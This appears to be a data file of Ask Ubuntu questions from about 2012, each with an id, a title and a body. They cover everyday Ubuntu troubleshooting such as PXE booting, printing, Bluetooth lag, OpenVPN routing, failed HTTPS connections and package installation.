189692	problem pxe booting	in relation to dist-upgrade of diskless ubuntu . i have upgraded my diskless image to 12.04 . i 've updated the the default file in my tftpboot server , but whenever i boot the server , it comes with the error message `` could not find kernel image : precise/vmlinuz i did try to cp the files into the /var/lib/tftboot/precise/ folder , and got it booting , but would really like for the symlinks to work . what am i doing wrong ? /var/lib/tftpboot/precise/default : label precise kernel precise/vmlinuz append root=/dev/nfs initrd=precise/initrd.img ip=dhcp > nfsroot=192.168.2.3 : /q/system/precise ro pci=noacpi ipv6.disable=1 panic=10 symlink is made with the following command : sudo ln -s /q/system/precise/vmlinuz same is done for initrd.img edit : the problem was resolved after creating a new debootstrap image to boot from .
189693	how to check if stream is empty ?	for example i want to execute : ps x | grep something | grep -v grep | somecommand i want to execute somecommand only if there is something running . how to do that ?
189694	tearing on onboard intel graphics with mythbuntu hd playback	im having tearing occur at the top 5 % of the screen with an intel onboard graphics when playing hd video during motion . i 'm using mythbuntu 12.04 with updated kernel and updated intel graphics driver packages . i 've tried using options `` triplebuffer '' `` true '' in xorg conf with no success . i 've also turned on the compiz workarounds suggested here https : //bugs.launchpad.net/xserver-xorg-video-intel/+bug/755841 with no success this is the xvinfo output : x-video extension version 2.2 screen # 0 adaptor # 0 : `` intel ( r ) textured video '' number of ports : 16 port base : 88 operations supported : putimage supported visuals : depth 24 , visualid 0x21 no port attributes defined maximum xvimage size : 2048 x 2048 number of image formats : 5 id : 0x32595559 ( yuy2 ) guid : 59555932-0000-0010-8000-00aa00389b71 bits per pixel : 16 number of planes : 1 type : yuv ( packed ) id : 0x32315659 ( yv12 ) guid : 59563132-0000-0010-8000-00aa00389b71 bits per pixel : 12 number of planes : 3 type : yuv ( planar ) id : 0x30323449 ( i420 ) guid : 49343230-0000-0010-8000-00aa00389b71 bits per pixel : 12 number of planes : 3 type : yuv ( planar ) id : 0x59565955 ( uyvy ) guid : 55595659-0000-0010-8000-00aa00389b71 bits per pixel : 16 number of planes : 1 type : yuv ( packed ) id : 0x434d5658 ( xvmc ) guid : 58564d43-0000-0010-8000-00aa00389b71 bits per pixel : 12 number of planes : 3 type : yuv ( planar ) kernel is linux mythtv 3.4.0-030400-generic # 201205210521 smp mon may 21 09:22:02 utc 2012 x86_64 x86_64 x86_64 gnu/linux intel driver version is xserver-xorg-video-int 2:2.19.0-0ubuntu1~xup1 x.org x server -- intel i8xx , i9xx display driver cpu is intel ( r ) core ( tm ) i3-2120 cpu @ 3.30ghz with 8gb ram .
189704	libreoffice prints everything half size	ever since i printed a document from evince in landscape orientation , libreoffice calc / writer refuses to print anything correctly . it is scaling everything by 0.5x and rotating it . to get the same effect , go to print - > page layout tab - > pages per sheet = 2 . however , i do n't want 2 . i want 1 . i have wizzed through all of the printing options a few times but ca n't get to the bottom of this . i 've restarted my printer and computer several times . i have done sudo apt-get purge libreoffice* and reinstalled again . still it will not print full size . ( of course i have checked that the page settings are set to a4 and portrait . ) update : this problem is specific to one printer only , to printing from within libreoffice ( calc , writer ) . with other printers / programs i have no problems .
189706	how to try ubuntu on a hp pavilion g7-1246ef computer that has no linux suport for video card ?	i want to try ubuntu on a hp pavilion g7-1246ef computer . i got it as a 64 bit system with a win7 64 bit but now it runs a 32 bit win 7 ( due to canon printer driver issue ) . the windows device manager displays : i have created a live usb and then cd of lubuntu 12.04 , a live usb of ubuntu 12.04 ( all 32 bit ) , and tried to boot in each of them , set to boot from usb , reached the page with try ubuntu but then selecting it nothing happened , or so it seemed : in fact using a 64 bit ubuntu 12.04 live usb i was first under the same impression but when i pushed power off i realized a window was barely visible on an almost black display , and even folder icons were there but almost invisible . i guess there are no video drivers for this system . is there a solution ? [ this is a late edit just to put things right for reference : even without nomodeset and without the proprietary driver , my machine would still work : just that the startup luminosity level was zero and had to put it up manually . ] ( i do not currently use ubuntu/linux on that machine , was just interested for a solution in such cases . )
189708	how to disable integrated webcam and still be able to use an external one	i am looking for a way to disable the webcam that is integrated into my laptop . the webcam is using uvcvideo module but i do not want to blacklist it since it is also being used by an external webcam i have . is there any way of disabling the device itself without touching the modules list ? this is how the webcams are listed by lsusb . the first one is an integrated one ( it is identified by some apps as bisoncam nb pro ) , the second one is the external logitech c525 : bus 002 device 004 : id 5986:0361 acer , inc bus 003 device 002 : id 046d:0826 logitech , inc . i have already checked bios - there is no way of disabling the webcam from there . besides i would love to learn how to disable the device by id anyway . thanks !
189709	can i get an image containing both ubuntu desktop and ubuntu server ?	i am a professor teaching operating systems . the students find it convenient to use a gui in ubuntu . however , after installing ubuntu server , they have to install ubuntu desktop . this requires tremendous downloads and becomes difficult when the whole class wants to do it . if they install the desktop version first , then they need downloads for additional packages . is there any dvd image of ubuntu 12.04 that allows server installation as well the ubuntu desktop ? from where can i download the same ?
189711	how to debug lag using bluetooth connected mouse and a2dp headset ?	i own a logitech m555b mouse for use with my hp elitebook 8570w laptop running kubuntu 12.04 . works fine right after connecting using the kde bluetooth control module . however , after some time ( seemingly random ) , it starts to lag . movements are being delayed for roughly 500ms for a short period of time . usually it recovers after some time too , but it can take minutes . all actions are being delayed : movements , click , scrolls . additionally , the movements can be choppy during these times . a workaround that always works for the same short period of time is to disconnect an re-connect the mouse . this can be done using the same kde bluetooth control module . what did i try already ? running this at boot time : echo on > `readlink -f /sys/class/bluetooth/hci0`/../../../power/level to disable any power saving features on the bluetooth hci0 device . check the mouse 's batteries ( it 's just a week old , other new batteries : same result ) checking logs and kernel messages about bluetooth-related entries : none aside the expected messages on connect time . i 'm running kernel 3.5.0-13-generic as provided in the xorg-edgers ppa . booting the regular 3.2 precise kernel results in the same behaviour . some other information that may help : it happens when no other bluetooth connections are active on the machine . similar symptoms also occur on my bluetooth stereo ( a2dp ) headset , but then it 's audio lagging and skipping . swapping bluetooth profiles as described here then helps . conclusion : it 's not the mouse that 's faulty . the headset always worked fine using my now dead thinkpad t61p with built-in bluetooth . the bluetooth module in my laptop is connected via usb and shows up as 0a5c:21e1 broadcom corp . turning the built-in bluetooth adapter off and using another one works fine , without lag . 0a5c:2046 broadcom corp. bluetooth device i 'm mobile and several people around me are using bluetooth at work ( a2dp mostly ) . it also occurs at home , where my neighbours are probably using bluetooth as well . it could just be radio interference , but i think bluetooth connections should just hop to another channel . and , moreover , it just works properly instantly when re-connecting . therefore i think it 's a software driver issue and i 'd like to debug it . is there any way to get more verbose logging on the bluetooth ( -hid ) modules ?
189713	what is the equivalent of the `` tracert '' dos command ?	tracert is a command in ms-dos command prompt to trace the route to an ip address . is there any command in the gnome terminal equivalent to this ?
189716	what is docky.exe in /usr/lib/docky/plugins ?	why there is a windows version of docky found inside my ubuntu 12.04 ? i 'm seeing this in my process list : mono /usr/lib/docky/docky.exe is this safe ? can i have the linux native docky ( linux binary ) ?
189719	how do i install network drivers ?	i got atheros9485 802.11b/g/n wifi adapter and ubuntu 12.04 but the driver is n't installed . i ca n't use 'additional drivers ' since i 'm not connected to a network nor have the driver . so what can i do ? i 'm new so if someone can explain in detail i would be grateful .
189721	error : gnu libc not found !	while using make.sh command for toolchain , i encountered the following error : checking for toolchain prerequisites checking for gnu bash [ done ] checking for gnu binutils [ done ] checking for gnu bison [ done ] checking for gnu bzip2 [ done ] checking for gnu coreutils [ done ] checking for gnu diffutils [ done ] checking for gnu findutils [ done ] checking for gnu awk [ done ] checking for gnu cc [ done ] checking for gnu libc [ fail ] error : gnu libc not found ! how can i solve this problem ?
189722	problem installing snort barnyard2	hi i have problem installing barnyard2 in snort . i am trying to do this steps using the snort pdf guide barnyard2 section . sudo tar zxvf barnyard2-1.9.tar.gz cd barnyard2-1.9 sudo ./configure -- with-mysql at first when i try to do this i encounter an error saying : error : unable to find mysql headers ( mysql.h ) ` so i went to install libmysql-dev following the instructions from this site here . problem regarding mysql.h was gone but i got another error when i tried this sudo ./configue -- with-mysql command . this time error is error : unable to find mysqlclient library ( libmysqlclient.* ) . so i went to follow instructions on this site here and tried to locate libmysqlclient where i have the following output : /usr/lib/i386-linux-gnu/libmysqlclient.so.18 /usr/lib/i386-linux-gnu/libmysqlclient.so.18.0.0 /usr/lib/i386-linux-gnu/libmysqlclient_r.so.18 /usr/lib/i386-linux-gnu/libmysqlclient_r.so.18.0.0 /usr/share/doc/libmysqlclient18 /usr/share/doc/libmysqlclient18/changelog.debian.gz /usr/share/doc/libmysqlclient18/copyright /var/lib/dpkg/info/libmysqlclient18 : i386.list /var/lib/dpkg/info/libmysqlclient18 : i386.md5sums /var/lib/dpkg/info/libmysqlclient18 : i386.postinst /var/lib/dpkg/info/libmysqlclient18 : i386.postrm /var/lib/dpkg/info/libmysqlclient18 : i386.shlibs i tried the command sudo ./configure âwith-mysql-libraries=/usr/lib/i386-linux-gnu/ and sudo ./configure âwith-mysql-libraries=/usr/share/doc/ after each command i was asked again for the first error message i encountered error : unable to find mysql headers ( mysql.h ) it seems like whenever i tried to set the path to where mysql.h or libmysqlclient is located the error just pops up . how do i solve this one ? just to let you know am just an average user of ubuntu and i do n't know alot of commands . i really appreciate if anyone could help out . thanks
189723	how to configure dnsv6 on a lan without internet access ?	i have a lan of ipv6 enabled hosts . i would like to setup a ubuntu as dnsv6 server for the local lan addresses ( there is no internet/tunneling stuff ) . i could manually edit the etc/hosts file for each host , but i think a local dnsv6 server would be more efficent . any suggestion ? edit : i found that dnsmasq solves brilliantly my problem ; however since by default is running with a lot o paramenters including -no-resolv ( this is probabily because the host ipv4 configuration ) , i need to stop and restart it manually . can this be avoided ?
189727	how can i change the standard files in nautilus ?	i do n't like the standard files in nautilus ( the ordering by data types - images , music , videos , documents etc . ) , how can i change this or can i change this ordering without getting problems with several software or ubuntu one ?
189728	nautilus and file command in 11.04 do n't show metadata for webm files	the file-name extension .webm is used for media files using the webm multimedia format , which consists of the webm container ( a subset of the matroska container ) and audio and video streams with independet enconding and quality settings . description of the issue : for files in the webm format , the program file says that files are raw data , instead of determining and displaying the real file-format , which is webm . besides , nautilus does n't display the technical metadata of files in this format . why is the file program not displaying the file format for webm files ?
189734	where is texlive2012 after installing it via iso ?	i downloaded the latest texlive2012 iso and installed it on my computer by running the install-tl script , i chosed the default installnation , and it finished successfully , but where can i find the executable binarys ? i 'm using ubuntu 12.04 lts
189736	did 12.04 just add multi-touch gesture support mid-release ?	i was reviewing the updates i was about to download today and i noticed that a lot of them had to do with gesture support , noticed that many of these were new installs rather than upgrades . has 12.04 just added multi-touch gesture support mid-release ? if so , what are the capabilities that this adds ? which applications already support these capabilities and can i expect others to add support in the near future ? here are the packages that were installed : install : libframe6 : amd64 ( 2.2.4-0ubuntu0.12.04.1 ) , libgeis1 : amd64 ( 2.2.9.2-0ubuntu1 ) , libgrail5 : amd64 ( 3.0.6-0ubuntu0.12.04.01 , automatic ) and here are those that were upgraded ( also including many with touch support ) : upgrade : libgrip0 : amd64 ( 0.3.4-0ubuntu2~ubuntu12.04.1 , 0.3.5-0ubuntu1~12.04.1 ) , eog : amd64 ( 3.4.2-0ubuntu1 , 3.4.2-0ubuntu1.1 ) , ginn : amd64 ( 0.2.4-0ubuntu1 , 0.2.4.1-0ubuntu1 ) of which the descriptions for the new installs are , libgeis1 : gesture engine interface support a common api for clients of a systemwide gesture recognition and propagation engine . libframe6 : touch frame library this library handles the buildup and synchronization of a set of simultaneous touches . the library is input agnostic , with bindings for mtdev , frame and xi2.1 . libgrail5 : gesture recognition and instantiation library this library consists of an interface and tools for handling gesture recognition and gesture instantiation . applications can use the grail callbacks to receive gesture primitives and raw input events from the underlying kernel device . and the descriptions for the upgraded packages are , ligrip0 : provides multitouch gestures to gtk+ apps libgrip hooks gesture recognition into gtk+ applications . ginn : gesture injector : no-geis , no-toolkits a daemon with jinn-like wish-granting capabilities : it gives applications the ability to support a subset of multi-touch gestures without having to integrate geis or multi-touch gtk/qt libs . adding in a ton of new libraries and upgrading the existing components makes me wonder if 12.04 is meant to start natively supporting gestures other than two finger scroll in the near future . i expected these capabilities to be introduced soon but i thought that they would only be rolled out in a new release , not as upgrades for an existing release . anyone have any info about this ?
189737	openvpn , server 12.04 , connect to machines in home lan behind vpn server	problem : i 've set up a working openvpn server , and am able to connect to it from anywhere using my mac laptop and tunnelblick . when i connect in , i 'm assigned an ip address of 10.8.0.x , the server is 10.8.0.1 , so i have no problems sshing into it . once sshd in , i can even ping other machines ( obviously ) on my home network ( 192.168.1.x ) . desired outcome : what i want , is , to connect to the vpn server , and instead of getting a 10.8.0.x address , i get a 192.168.1.x on my home network . i ca n't figure out how to talk to the other machines on my home network without being sshd in to the vpn server . i 'd like to just connect to my vpn server , then be a part of my home network . attempted solutions : i 've read that i need to set up routes , and/or enable ip forwarding . i enabled ip forwarding using sudo sysctl -w net.ipv4.ip_forward=1 and that does n't seem to have done anything . i 've also uncommented a line in the openvpn 's server.conf file : # push routes to the client to allow it # to reach other private subnets behind # the server . remember that these # private subnets will also need # to know to route the openvpn client # address pool ( 10.8.0.0/255.255.255.0 ) # back to the openvpn server . push `` route 192.168.1.0 255.255.255.0 '' ; push `` route 192.168.20.0 255.255.255.0 '' but still no luck , i still get a 10.8.0.x address ... i 've also read i may have to add routes to the router itself , but have n't tried that . any help appreciated , thanks !
189740	how to organize periodic maintenance tasks ?	i have a couple thinks i like to do every now and then , but that are connected to some things that can not be determined by the computer directly , like those : create a backup of some ftp servers . the problem is that it takes some time to to this and i 'd like to run it only at home , since the passwords are not encrypted . do a virus scan of all the files that i exchange with other people . for this , i would like to avoid doing this on battery , since it consumes so much power . clean up octave-core files through the file system . this is a simple find command , and could be run at any time really . i got a similar one to remove all the unison files . compress all git repositories . this takes some times as well and i 'd like to run that only when i am not working on programming things right now . run updatedb , which has do be done as root though . cron jobs seem kind of good , but i am not sure whether they would be started when the computer was off during that time , and if they would be done on the next start , it would hog the ressources when i have to do something time critical . on the mac , there is the periodic daily weekly monthly command which performs those kind of things . is there something i could use for this or should i just create some scripts like maintenance-home.sh , maintenance-monthly.sh and so on ?
189741	difference between gnome-screensaver-command -a and gnome-screensaver-command -l	i was trying to figure out difference between gnome-screensaver-command -a and gnome-screensaver-command -l according to the gnome-screensaver-command man page ... -l , -- lock tells the running screensaver process to lock the screen immediately -a , -- activate turn the screensaver on ( blank the screen ) for me in both the cases it generated the login screen.can some one outline the difference in the two things ? ?
189742	recover the ubuntu	i have dual boot on my laptop , win 7 & ubuntu 12.04 lts . my win 7 gets crashed so i reinstall it . but after the installation of win7 my ubuntu is unaccessible to me . the windows loader gets stared , intead of linux loader . so how i recoverd back my ubuntu ?
189746	upgrade stuck at update manager versions details	i have been upgrading to 12.10 beta 1 but ran into a issue , it asked which version of update manager i would like to use but when i pressed details ( d ) for more info it got stuck at that screen and i donât know how to get it updating again . here is the current terminal output 100 +++ /etc/update-manager/release-upgrades.dpkg-new 2012-08-08 15:39:07.000000000 +0100 @ @ -14,4 +14,4 @ @ # used if the currently-running release is not itself an lts # release , since in that case the upgrader wo n't be able to # determine if a newer release is available . -prompt=normal +prompt=normal ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ( end ) what can i do to get it started again ? i now know i want to use the non lts ( 12.10 ) update manager .
189752	ca n't connect to certain https sites	i 've just moved to a new apartment and with internet connection via a router and i 'm finding that i ca n't connect to quite a few sites that use ssl . for example trying to connect to paypal : curl -v https : //paypal.com * about to connect ( ) to paypal.com port 443 ( # 0 ) * trying 66.211.169.3 ... connected * successfully set certificate verify locations : * cafile : none capath : /etc/ssl/certs * sslv3 , tls handshake , client hello ( 1 ) : * unknown ssl protocol error in connection to paypal.com:443 * closing connection # 0 curl : ( 35 ) unknown ssl protocol error in connection to paypal.com:443 curl -v -ssl https : //paypal.com gives the same output . for some sites it works : curl -v https : //www.google.com * about to connect ( ) to www.google.com port 443 ( # 0 ) * trying 74.125.235.112 ... connected * successfully set certificate verify locations : * cafile : none capath : /etc/ssl/certs * sslv3 , tls handshake , client hello ( 1 ) : * sslv3 , tls handshake , server hello ( 2 ) : * sslv3 , tls handshake , cert ( 11 ) : * sslv3 , tls handshake , server key exchange ( 12 ) : * sslv3 , tls handshake , server finished ( 14 ) : * sslv3 , tls handshake , client key exchange ( 16 ) : * sslv3 , tls change cipher , client hello ( 1 ) : * sslv3 , tls handshake , finished ( 20 ) : * sslv3 , tls change cipher , client hello ( 1 ) : * sslv3 , tls handshake , finished ( 20 ) : * ssl connection using ecdhe-rsa-rc4-sha * server certificate : * subject : c=us ; st=california ; l=mountain view ; o=google inc ; cn=www.google.com * start date : 2011-10-26 00:00:00 gmt * expire date : 2013-09-30 23:59:59 gmt * common name : www.google.com ( matched ) * issuer : c=za ; o=thawte consulting ( pty ) ltd. ; cn=thawte sgc ca * ssl certificate verify ok. > get / http/1.1 > user-agent : curl/7.22.0 ( x86_64-pc-linux-gnu ) libcurl/7.22.0 openssl/1.0.1 zlib/1.2.3.4 libidn/1.23 librtmp/2.3 > host : www.google.com > accept : */* > < http/1.1 302 found < location : https : //www.google.co.jp/ . . . i 'm using ubuntu 12.04 , with windows 7 installed as well . these sites work on windows : ( not sure if this information helps but i ran ifconfig and got the following : eth0 link encap : ethernet hwaddr 1c : c1 : de : bc : e2:4f inet6 addr : 2408 : c3:7fff:991:686b:8d18:81b3:8dd1/64 scope : global inet6 addr : 2408 : c3:7fff:991:1ec1 : deff : febc : e24f/64 scope : global inet6 addr : fe80 : :1ec1 : deff : febc : e24f/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:87075 errors:0 dropped:0 overruns:0 frame:0 tx packets:54522 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:78167937 ( 78.1 mb ) tx bytes:10016891 ( 10.0 mb ) interrupt:46 base address:0x4000 eth1 link encap : ethernet hwaddr ac:81:12:0d:93:80 inet6 addr : fe80 : :ae81:12ff : fe0d:9380/64 scope : link up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:498 tx packets:0 errors:26 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:17 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:630 errors:0 dropped:0 overruns:0 frame:0 tx packets:630 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:39592 ( 39.5 kb ) tx bytes:39592 ( 39.5 kb ) ppp0 link encap : point-to-point protocol inet addr:180.57.228.200 p-t-p:118.23.8.175 mask:255.255.255.255 up pointopoint running noarp multicast mtu:1492 metric:1 rx packets:39631 errors:0 dropped:0 overruns:0 frame:0 tx packets:22391 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:3 rx bytes:43462054 ( 43.4 mb ) tx bytes:2834628 ( 2.8 mb ) i 've run ping : ping www.paypal.com ping e6166.b.akamaiedge.net ( 184.31.66.234 ) 56 ( 84 ) bytes of data . 64 bytes from a184-31-66-234.deploy.akamaitechnologies.com ( 184.31.66.234 ) : icmp_req=1 ttl=54 time=15.3 ms 64 bytes from a184-31-66-234.deploy.akamaitechnologies.com ( 184.31.66.234 ) : icmp_req=2 ttl=54 time=15.0 ms 64 bytes from a184-31-66-234.deploy.akamaitechnologies.com ( 184.31.66.234 ) : icmp_req=3 ttl=54 time=15.2 ms 64 bytes from a184-31-66-234.deploy.akamaitechnologies.com ( 184.31.66.234 ) : icmp_req=4 ttl=54 time=17.2 ms 64 bytes from a184-31-66-234.deploy.akamaitechnologies.com ( 184.31.66.234 ) : icmp_req=5 ttl=54 time=16.6 ms 64 bytes from a184-31-66-234.deploy.akamaitechnologies.com ( 184.31.66.234 ) : icmp_req=6 ttl=54 time=16.7 ms 64 bytes from a184-31-66-234.deploy.akamaitechnologies.com ( 184.31.66.234 ) : icmp_req=7 ttl=54 time=14.8 ms ^c -- - e6166.b.akamaiedge.net ping statistics -- - 7 packets transmitted , 7 received , 0 % packet loss , time 6009ms rtt min/avg/max/mdev = 14.878/15.890/17.214/0.901 ms and without www : ping paypal.com ping paypal.com ( 66.211.169.66 ) 56 ( 84 ) bytes of data . ^c -- - paypal.com ping statistics -- - 303 packets transmitted , 0 received , 100 % packet loss , time 302265ms traceroute : traceroute www.paypal.com traceroute to www.paypal.com ( 184.31.66.234 ) , 30 hops max , 60 byte packets 1 118.23.8.175 ( 118.23.8.175 ) 8.424 ms 8.404 ms 8.540 ms 2 118.23.10.121 ( 118.23.10.121 ) 8.212 ms 8.189 ms 8.162 ms 3 122.1.164.213 ( 122.1.164.213 ) 9.405 ms 11.359 ms 13.469 ms 4 60.37.55.165 ( 60.37.55.165 ) 8.049 ms 8.072 ms 8.040 ms 5 118.23.168.89 ( 118.23.168.89 ) 8.574 ms 8.549 ms 8.558 ms 6 210.163.230.238 ( 210.163.230.238 ) 8.667 ms 7.605 ms 7.545 ms 7 xe-4-0-0.a21.osakjp01.jp.ra.gin.ntt.net ( 61.213.169.218 ) 18.255 ms 18.232 ms xe-3-0-0.a21.osakjp01.jp.ra.gin.ntt.net ( 61.213.162.206 ) 19.042 ms 8 * * * 9 * * * . . . 29 * * * 30 * * * without www : traceroute paypal.com traceroute to paypal.com ( 66.211.169.66 ) , 30 hops max , 60 byte packets 1 118.23.8.175 ( 118.23.8.175 ) 5.607 ms 5.674 ms 5.875 ms 2 118.23.10.121 ( 118.23.10.121 ) 5.468 ms 5.453 ms 5.576 ms 3 122.1.164.213 ( 122.1.164.213 ) 7.595 ms 10.062 ms 11.660 ms 4 60.37.55.165 ( 60.37.55.165 ) 5.684 ms 5.660 ms 5.635 ms 5 60.37.27.90 ( 60.37.27.90 ) 5.960 ms 5.924 ms 5.898 ms 6 ae-11.r20.tokyjp01.jp.bb.gin.ntt.net ( 129.250.12.197 ) 86.468 ms 30.960 ms 30.899 ms 7 as-1.r20.sttlwa01.us.bb.gin.ntt.net ( 129.250.4.189 ) 161.185 ms 144.343 ms 132.410 ms 8 ae-1.r05.sttlwa01.us.bb.gin.ntt.net ( 129.250.5.47 ) 139.008 ms 127.377 ms 139.050 ms 9 xe-0.sprint.sttlwa01.us.bb.gin.ntt.net ( 129.250.9.190 ) 116.006 ms 104.306 ms 115.954 ms 10 144.232.1.153 ( 144.232.1.153 ) 141.046 ms 129.870 ms 140.991 ms 11 sl-crs2-sj-0-5-2-0.sprintlink.net ( 144.232.18.204 ) 131.271 ms 131.248 ms 142.544 ms 12 sl-st31-sj-0-15-0-0.sprintlink.net ( 144.232.8.151 ) 129.543 ms 141.575 ms 141.066 ms 13 * * * 14 * * * . . . 29 * * * 30 * * * the tcpdump : 1 0.000000 114.178.88.59 66.211.169.66 tcp 76 37374 > https [ syn ] seq=0 win=14520 len=0 mss=1452 sack_perm=1 tsval=68855 tsecr=0 ws=64 2 0.136291 66.211.169.66 114.178.88.59 tcp 80 https > 37374 [ syn , ack ] seq=0 ack=1 win=4356 len=0 mss=1460 ws=1 tsval=3608913175 tsecr=68855 sack_perm=1 3 0.136322 114.178.88.59 66.211.169.66 tcp 68 37374 > https [ ack ] seq=1 ack=1 win=14528 len=0 tsval=68889 tsecr=3608913175 4 0.137409 114.178.88.59 66.211.169.66 ssl 309 client hello 5 0.274446 66.211.169.66 114.178.88.59 ssl 95 [ tcp previous segment lost ] continuation data 6 0.274469 114.178.88.59 66.211.169.66 tcp 80 [ tcp dup ack 4 # 1 ] 37374 > https [ ack ] seq=242 ack=1 win=14528 len=0 tsval=68923 tsecr=3608913175 sle=2881 sre=2908 7 7.117833 91.189.89.76 114.178.88.59 tlsv1 142 application data , application data 8 7.118823 114.178.88.59 91.189.89.76 tlsv1 216 application data , application data , application data , application data 9 7.393725 91.189.89.76 114.178.88.59 tcp 68 https > 41264 [ ack ] seq=75 ack=149 win=146 len=0 tsval=875420654 tsecr=70634 10 60.301444 66.211.169.66 114.178.88.59 tcp 56 https > 37374 [ rst , ack ] seq=2908 ack=242 win=4597 len=0 this is a japanese isp and even though i 'm connecting to with a cable to the modem / router i need to add a username and password , but with ubuntu 's `` wired '' connection i could n't add these . my housemate told me to create an ocn connection but i 'm not sure if that 's a name of a type of network or just the japanese company ... but after looking at her computer we found it to be a pppoe connection . after some googling i learned that to create a pppoe connection i would need to create a dsl connection and that i could add a password & username to it . i also changed the `` wired '' connection to not connect automatically . i get the same problem if i hook up to the modem directly . i 've tried changing the dsl mtu to 500 , 1500 , 1492 and 1482 but it did n't make a difference . also for some reason ubuntu does n't always pick up the connection , i sometimes have to restart for it to connect .
189753	how to make this `` svngrep '' alias work on `` .bash_aliases '' ?	i added to following line to the `` ~/.bash_aliases '' file : alias svngrep='grep -r $ 1 ./* -- exclude-dir `` .svn '' ' but it 's not working . it outputs ( in my translation to english ) : svngrep test grep : test : file or directory not found but with the full `` grep '' line it works just fine . any idea what 's wrong with my alias ?
189755	chrome has two sets of close , maximize , minimize buttons	why do i have two sets of close minimize maximize controls in my chrome window ? please see the upper left corner of this window shot . it 's a waste of space .
189756	is there any way for selecting text in ubuntu server ?	i 'm running ubuntu server virtually . i ca n't select any text with the mouse since we all know there is no mouse in the server version . so how can i select particular lines of text in ubuntu server ?
189758	how to completely remove wicd from 12.04 ?	i had issues with wifi so i removed network manager . i booted windows os ( dual booting windows 7 and 12.04 ) to download wicd 1.7.2.4 . extracted it and installed . however , wcid worked properly with wired connection but could not connect to wifi . so , i re-installed network manager which works properly now , and wicd connects to wifi too . as soon as i disconnect from network manager , wicd connects only to wired . at this point , i wanted to remove wicd but apt-get returns no wicd installed , ca n't see it in synaptic or software center , but only in applications list under dash home . of course wcid icon shows connections , and resulting connected , so my system shows both applets for wicd and network manager in the top panel . when running dpkg commands , wicd is not listed as installed package . any suggestion how to remove wicd ? consider that i started with ubuntu just few months ago so my knowledge base is limited .
189765	i screwed up my icons with myunity	i wanted myunity specifically for the ability to have more than 4 virtual desktops , that is really all that i absolutely needed it for . however , then i got to playing with it wanting to customize my themes and whatnot , all was going ok until all my system icons went missing . that is to say , they 're not completely missing , but all folders and files without a live preview show up as a page with a bent-corner . also , folder icons in the alt-tab popup show up as completely transparent ; they still take up room and have a label , just no visible icon . i have tried playing around with myunity themes and icon sets and no matter what i ca n't seem to get things back to where they were . this is n't a huge encumbrance but it is starting to get more and more annoying and i feel like i 'm missing out in understanding something about how unity works . what could have caused this and how do i fix it ? update : per a commenter 's suggestion i tried running unity -- reset-icons . after 15 minutes it was still scrolling by ( i assume it was in a loop ) . here is what was in my terminal buffer at the time i ctrl+c'ed .
189766	how to store my gnome terminal color palette	i use terminal and vim extensively , while writing code . i have created a color palette which is based on readability and easy-use with an autocomplete plugin ( obtain plugins from pydiction : tab-complete your python code , auto pairs : insert or delete brackets , parens , quotes in pair . ) . i want to backup these settings so i can reuse them when i have problems with my current installation ( 12.04 , by the way , i plan a clean ubuntu 12.10 install in october ) . are these settings are stored in a config file ? or if they are stored in gconf/dconf , how can i write a shell script to restore it ?
189767	eclipse launcher does n't work in xubuntu	i installed 12.04 xubuntu and latest eclipse . java is also installed . path is set correctly . but there are two things strange to me . when i double click the eclipse executable , it says can not find java ; create a launcher on the desktop , it says the same thing as above ; ** open a terminal , type eclipse , it will start eclipse without any error . type java in terminal also shows java is installed and available to the system .
189772	how to know the package name in apt-get install < packagename > ?	we use this command to install packages on our system ... common syntax : sudo apt-get install < packagename > for example ... sudo apt-get install g++ now in this case it was easy as we new the 1-word name `` g++ '' . but some times this < packagename > differes from the actual name of the program or the actual name consists of 2 or more words like `` nvidia x server settings '' ... but the command is : sudo apt-get install nvidia-settings my question is : how do people come to know that nvidia-settings is the required < packagename > for nvidia x server settings ? is there any standard way to know the < packagename > for the desired program ? edit : for example if i want to install google chrome then how can i know that what should be replaced by < packagename > ? : sudo apt-get install < packagename >
189785	how do i `` print '' to a postscript file from libreoffice write ?	using openoffice with 10.04 i was able to print to a postscript file , but i find i ca n't do this with libreoffice and 12.04 - print-to-file goes to pdf . i want this feature so that i can use a fineprint-like tool called fprint to print .ps files in booklet form . when i print from other applications i 'm offered the usual choice of printers , including print to .ps , but libreoffice restricts my choice .
189787	how to find available applications on unity	on previous versions of ubuntu i had a menu listing installed applications , sorted by categories . i never could find anything similar in unity . the dash never lists any application so i must find the application 's executable file in the console and manually make a shortcut . i never was able to display anything looking like this . is there something i missed ? do i have to install a lens or something ? how do you access the famous `` application-lens '' ?
189788	dual boot installation with win7 - install ubuntu in new partition	under win 7 i created a new 100 gb disk partition ( l : ) to install ubuntu 12.04 . i then rebooted from the ubuntu install cd , selected `` install side by side '' and now i 'm stuck . i end up at the advanced partitioning tool and i do not know how to tell the installer to use the l : partition . any help would be appreciated . thanks ! thank you . i have successfully installed ubuntu 12.04 alongside win 7 . however , now when i reboot the laptop it goes directly to win 7 with no option to choose ubuntu . any thoughts on how to get the boot-time choice to show up ? thanks !
189789	how can i specify `` fit to page '' when printing on the command line with lpr ?	i 'm trying to print an image from the command line , usign lpr , but it ends up printing 4 pages instead of just one . is there a way to tell lpr to fit the image to the page ?
189790	tell user to reload his pc in script	i need to send a message to a user , that he needs to reload his pc , and i need to do it like some programms do ( showing the red power button in the rigth top part of the screen `` reload your computer '' or something like this ) but i need to do it in a post installation script . how i can do this ?
189796	wubi without downloading ubuntu-12.04.1-wubi-i386.tar.xz	i have a class of computational physics . i want to install ubuntu on 24 systems , unfortunately our access to the internet is limited . on the other hand i do not like to make new partitions for linux . so i have to use wubi but wubi needs a large file i.e : `` ubuntu-12.04.1-wubi-i386.tar.xz '' . unfortunately i could not make a transition to wubi because when i put `` ubuntu-12.04.1-wubi-i386.tar.xz '' manually in the ubuntu/disks directory , wubi starts to complain about the existence of already installed ubuntu and all thing should be done from scratch . does anybody know a solution for this problem ?
